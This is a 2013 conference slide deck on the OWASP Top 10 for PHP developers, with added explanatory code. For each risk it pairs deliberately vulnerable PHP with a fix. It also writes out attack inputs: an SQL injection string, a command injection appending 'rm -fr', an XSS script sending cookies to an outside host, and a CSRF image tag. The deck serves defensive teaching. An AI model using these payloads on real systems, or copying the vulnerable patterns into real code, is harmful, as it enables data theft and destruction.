Presented at #PHPLX 11 September 2013
The 2013 edition of the OWASP (Open Web Application Security Project) Top 10 has just been released and, unfortunately, Injection (not only SQL injection) is still the most common security problem. In this talk we review the Top 10 list of security problems, looking at possible attack scenarios and ways to protect against them, mostly from a PHP programmer's perspective.
OWASP TOP 10 PHP Security Risks
1. Follow this topic:
@rjsmelo, #owasp, #php, #appsec
OWASP TOP 10 for PHP programmers
RICARDO MELO
Presented at #PHPLX – 11 September 2013
2. @rjsmelo 2
RICARDO MELO
● CTO @ DRI
● PHP, MySQL, Linux and lots of other OSS
● ZCE, RHCE, LPI 3, ITIL, etc.
● +10 years building (and breaking) things
About
● 14-year-old academic spin-off
● Pragmatic OSS orientation
● PHP, MySQL, SugarCRM, Drupal, JavaScript, Linux, etc.
● Crafters, Integrators
● Always looking for software developers
– Yes, right now!
4. 1999 - 2013 DRI. Some Rights Reserved
.
4
Outline
● OWASP
● OWASP TOP 10
● What's Next
● Conclusions
What is OWASP?
● Open Web Application Security Project
● Worldwide not-for-profit
● Focus on security improvement and awareness
● Very active community
● Lots of projects (you can start yours)
What is OWASP TOP 10
● The name is “The Top 10 Most Critical Web Application Risks”
● The focus is awareness
● Released 2003, 2004, 2007, 2010 and 2013
https://www.owasp.org/index.php/Top_10_2013
Risk?
Each Top 10 entry is rated along these factors (the OWASP risk rating model); the first and last columns depend on the application and business:

Threat Agent         | Attack Vectors | Weakness Prevalence | Weakness Detectability | Technical Impacts | Business Impacts
Application Specific | EASY           | WIDESPREAD          | EASY                   | SEVERE            | Application / Business Specific
                     | AVERAGE        | COMMON              | AVERAGE                | MODERATE          |
                     | DIFFICULT      | UNCOMMON            | DIFFICULT              | MINOR             |
OWASP TOP 10 - 2013
● A1 – Injection
● A2 – Broken Authentication and Session
Management
● A3 – Cross-site Scripting (XSS)
● A4 – Insecure Direct Object References
● A5 – Security Misconfiguration
● A6 – Sensitive Data Exposure
● A7 – Missing Function Level Access Control
● A8 – Cross Site Request Forgery (CSRF)
● A9 – Using Components with Known Vulnerabilities
● A10 – Unvalidated Redirects and Forwards
A1 - Injection
● Occurs when untrusted data is sent directly to the interpreter!
● Not only SQL: NoSQL, LDAP, OS, XML, XPath!
● Never, NEVER trust ANY input!
A1 – Injection Examples - SQL
<?php
// prone to SQL injection
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
              'username',
              'password');
// the request parameter is concatenated straight into the statement text
$stmt = $db->query(
    "SELECT * FROM some_table limit "
    . $_REQUEST['start_record']
    . ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set start_record = "1; delete from some_table; -- "

<?php
// fixed: the value is bound as a parameter and never becomes part of the SQL text
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
              'username',
              'password');
$stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
// LIMIT arguments must be bound as integers: handing the value to execute()
// binds it as a quoted string, which MySQL rejects inside a LIMIT clause
$stmt->bindValue(1, (int) $_REQUEST['start_record'], PDO::PARAM_INT);
$stmt->execute();
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
A1 - Injection Samples - OS
<?php
// prone to OS command injection
// script.php?file=xpto.pdf
$fileType = exec("file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"

<?php
// fixed: the argument is quoted so the shell treats it as one word, not as commands
// script.php?file=xpto.pdf
$fileType = exec("file " . escapeshellarg($_REQUEST['file']));
echo $fileType;
A2 – Broken Authentication and Session Management
● Broken implementations allowing an attacker to assume “other” users' identities!
● Can be session hijacking / fixation
● Broken authentication
● Or other failures that lead to compromised passwords / keys / session tokens
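The slides give no code for A2, so here is an added example (not from the deck) of login and logout handling that addresses the fixation, hijacking and token-lifetime points above: the session id is regenerated on login, the cookie is marked Secure and HttpOnly, ids not issued by the server are rejected, and idle sessions expire. It assumes a plain PHP session and a caller that obtains the user id from its own authentication step.

```php
<?php
// Added example (not from the slides): session handling for A2.
// Cookie and id policy must be set before session_start().
session_set_cookie_params(array(          // array form needs PHP >= 7.3
    'lifetime' => 0,                      // discarded when the browser closes
    'path'     => '/',
    'secure'   => true,                   // never sent over plain HTTP
    'httponly' => true,                   // not readable by script (limits cookie theft via XSS)
    'samesite' => 'Lax',
));
ini_set('session.use_strict_mode', '1');  // reject ids the server did not issue
ini_set('session.use_only_cookies', '1'); // never take the id from the URL
session_start();

function login_user($userId)
{
    // Fixation defence: a fresh id on privilege change, so an id planted
    // before login never becomes an authenticated session
    session_regenerate_id(true);
    $_SESSION['userInfo']    = $userId;
    $_SESSION['last_active'] = time();
}

function logout_user()
{
    $_SESSION = array();
    $p = session_get_cookie_params();
    // expire the cookie client-side as well, then drop the server-side data
    setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'],
              $p['secure'], $p['httponly']);
    session_destroy();
}

function require_login($idleLimit = 900)
{
    if (empty($_SESSION['userInfo'])) {
        return false;
    }
    // idle timeout: an abandoned or stolen session stops working on its own
    if (time() - $_SESSION['last_active'] > $idleLimit) {
        logout_user();
        return false;
    }
    $_SESSION['last_active'] = time();
    return true;
}
```

Call login_user() only after the credentials have been verified, and require_login() at the top of every page that needs an authenticated user.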
A3 – Cross-Site Scripting (XSS)
● Whenever untrusted data is sent to the browser without proper validation and escaping!
● XSS allows the attacker to OWN the victim's browser and do ... everything!
● Stored, Reflected and DOM-based XSS
A3 – steal user cookie
<?php
// page prone to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?></p>
<?= render_results($results); ?>
</body>
</html>
// set search to:
"<script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>"

<?php
// fixed: the value is HTML-escaped before it reaches the browser
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<!-- ENT_COMPAT leaves single quotes alone, which is fine inside a text node;
     use ENT_QUOTES when the value lands inside an attribute value -->
<p>results for : <?= htmlentities($_REQUEST['search'], ENT_COMPAT | ENT_HTML401, 'UTF-8'); ?></p>
<?= render_results($results); ?>
</body>
</html>
A4 – Insecure Direct Object Reference
● Whenever a developer exposes references to internal objects without proper access control.
● Attackers can change the references and access resources that shouldn't be accessible.
A4 – Access other user account
<?php
// prone to insecure direct object reference
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9"?

<?php
// fixed: the reference is still exposed, but access is checked against the logged-in user
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
if ($account->canRead($user)) {
    echo render_account_info($account);
} else {
    echo "Access denied";
}
A5 – Security Misconfiguration
● Failing to secure the full stack often leads to the application / servers being compromised.
● Take into consideration other services / applications running in the same infrastructure
● Watch out for outdated software
● Watch out for default accounts
A6 – Sensitive Data Exposure
● Whenever sensitive data isn't properly protected, allowing attackers to steal or modify that information.
● Credit card fraud, identity theft, etc.!
● Be aware: data should be protected both in transit and on the storage engine (don't forget the backups)
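Passwords are the sensitive data most often found unprotected on the storage engine. As an added example (not from the slides), this is how to store and check them so that a leaked users table or backup does not expose the passwords themselves; it assumes a PDO handle $db and a table users(id, username, password_hash).

```php
<?php
// Added example (not from the slides): password storage for A6.
// Assumes a PDO connection $db and a table users(id, username, password_hash).

function store_password(PDO $db, $username, $password)
{
    // password_hash() (PHP >= 5.5) adds a random salt and uses a slow algorithm;
    // the hash is all that is stored, never the clear-text password
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
    $stmt->execute(array($username, $hash));
}

function check_password(PDO $db, $username, $password)
{
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute(array($username));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null; // same answer for "unknown user" and "wrong password"
    }
    // transparent upgrade when the default algorithm or cost has changed
    // since the hash was written
    if (password_needs_rehash($row['password_hash'], PASSWORD_DEFAULT)) {
        $upd = $db->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
        $upd->execute(array(password_hash($password, PASSWORD_DEFAULT), $row['id']));
    }
    return (int) $row['id'];
}

// usage: $db is a PDO handle like the one on the A1 slide
$userId = check_password($db, $_POST['username'], $_POST['password']);
```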
A7 – Missing Function Level Access Control
● Most applications validate function-based access control before displaying options in the UI, but fail to validate it when the function is accessed.
● An attacker can forge requests to functions that shouldn't be available
A7 – insecure function
<?php
// prone to insecure function access
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
switch ($action) {
    case 'read':
        echo render_user($user);
        break;
    case 'delete':
        $user->delete();
        echo "user Deleted";
        break;
}
// and if I change action to "delete"?

<?php
// fixed: each action checks the logged-in user's permission when it is executed,
// not only when the option is shown in the UI
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
switch ($action) {
    case 'read':
        if ($user->canRead($loggedUser)) {
            echo render_user($user);
        }
        break;
    case 'delete':
        if ($user->canDelete($loggedUser)) {
            $user->delete();
            echo "user Deleted";
        }
        break;
}
A8 – Cross Site Request Forgery (CSRF)
● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session)
● No difference from user-generated requests!
A8 – delete user
<?php
// vulnerable app
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
// the permission check passes: the victim's own browser and session send the request
if ($user->canDelete($loggedUser)) {
    $user->delete();
}
?>
// attacker's site:
<img src="http://www.example.com/users/delete.php?id=123" />

<?php
// fixed app: the request must also carry a token that only the real page can know
// delete.php?id=123&token=<value issued to this session>
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
// validate_token() compares the submitted value with the one stored in the session
if (validate_token($_REQUEST['token'])) {
    if ($user->canDelete($loggedUser)) {
        $user->delete();
    }
}
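The slide leaves validate_token() undefined. As an added example (not code from the deck), here is one way to implement it: a per-session random token, embedded in the legitimate form and compared in constant time; the delete is also moved to POST so an <img> tag cannot trigger it at all. User and AppUser are the classes from the slides.

```php
<?php
// Added example (not from the slides): a session-bound CSRF token for A8.
session_start();

function csrf_token()
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 random bytes from the OS CSPRNG (random_bytes: PHP >= 7.0)
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function validate_token($token)
{
    if (empty($_SESSION['csrf_token']) || !is_string($token)) {
        return false;
    }
    // hash_equals() avoids leaking the token through timing differences
    return hash_equals($_SESSION['csrf_token'], $token);
}

// delete.php: only POST, and only with this session's token
if ($_SERVER['REQUEST_METHOD'] === 'POST' && validate_token($_POST['token'] ?? '')) {
    $id = intval($_POST['id']);
    $user = new User($id);                              // classes from the slides
    $loggedUser = new AppUser($_SESSION['userInfo']);
    if ($user->canDelete($loggedUser)) {
        $user->delete();
    }
} else {
    http_response_code(403);
}
?>
<!-- the form that legitimately triggers the delete carries the token -->
<form method="post" action="/users/delete.php">
    <input type="hidden" name="id" value="123">
    <input type="hidden" name="token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    <button type="submit">Delete user 123</button>
</form>
```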
A9 – Using Components with Known Vulnerabilities
● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities.
● Attackers can leverage these issues to attack your application / server / etc.
A10 – Unvalidated Redirects and Forwards
● Web applications often redirect users to other pages, using untrusted data to determine the destination page.
● Attackers can redirect victims to phishing or malware pages, or use forwards to access unauthorized pages.
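The deck shows a forward on the next slide but no redirect. As an added example (not from the slides), this is a redirect that only follows destinations the application itself allows: site-relative paths, or absolute URLs whose host is on an allow list. It assumes the destination arrives as a hypothetical ?next= parameter.

```php
<?php
// Added example (not from the slides): validated redirect target for A10.
function safe_redirect_target($next, array $allowedHosts, $fallback = '/')
{
    if (!is_string($next) || $next === '') {
        return $fallback;
    }
    // A site-relative path is fine, but "//host" (and "/\host" in some browsers)
    // is a protocol-relative URL that leaves the site
    if ($next[0] === '/' && $next !== '//' . substr($next, 2)
        && substr($next, 0, 2) !== '/\\') {
        return $next;
    }
    $parts = parse_url($next);
    if ($parts === false || empty($parts['host'])) {
        return $fallback;
    }
    $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
    if (!in_array($scheme, array('http', 'https'), true)) {
        return $fallback; // javascript:, data:, etc.
    }
    // exact host match only; "www.example.com.attacker.example" must not pass
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return $fallback;
    }
    return $next;
}

// usage: hosts this application is allowed to send users to (constructed list)
$allowed = array('www.example.com', 'shop.example.com');
$target = safe_redirect_target(isset($_GET['next']) ? $_GET['next'] : null, $allowed);
header('Location: ' . $target, true, 302);
exit;
```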
A10 – “simple” Forward
<?php
class someController extends baseController {
    public function preFunction($args, $action)
    {
        // access control is checked only for the action that was requested
        $this->checkAccess($args, $action);
    }
    public function indexAction($args)
    {
        // [...] do something here
        // "simple" forward: any method of this class can be reached through
        // ?callback=destroyAction and nothing re-checks access for it
        if (!empty($args['callback']) && method_exists($this, $args['callback'])) {
            $callback = $args['callback'];
            unset($args['callback']);
            call_user_func_array(array($this, $callback), $args);
        }
        return $response;
    }
    public function destroyAction($args)
    {
        $this->selfTerminate();
    }
}

// fixed forward inside indexAction: run the access check for the callback
// before forwarding to it
if (!empty($args['callback']) && method_exists($this, $args['callback'])) {
    $callback = $args['callback'];
    $this->preFunction($args, $callback);
    unset($args['callback']);
    call_user_func_array(array($this, $callback), $args);
}
What's Next For PHP Programmers
● OWASP
– http://goo.gl/lVRRY
● Cheat Sheets
– http://goo.gl/lVRRY
● OWASP Zed Attack Proxy
– http://goo.gl/QE5v1H
● OWASP Books – free
– http://goo.gl/aLx1q2
Conclusions
● Keeping the application secure is a continuous process
● Avoiding the TOP 10 risks doesn't make your application secure, but it is already a HUGE step forward.
● Don't trust ANY input! Escape every output!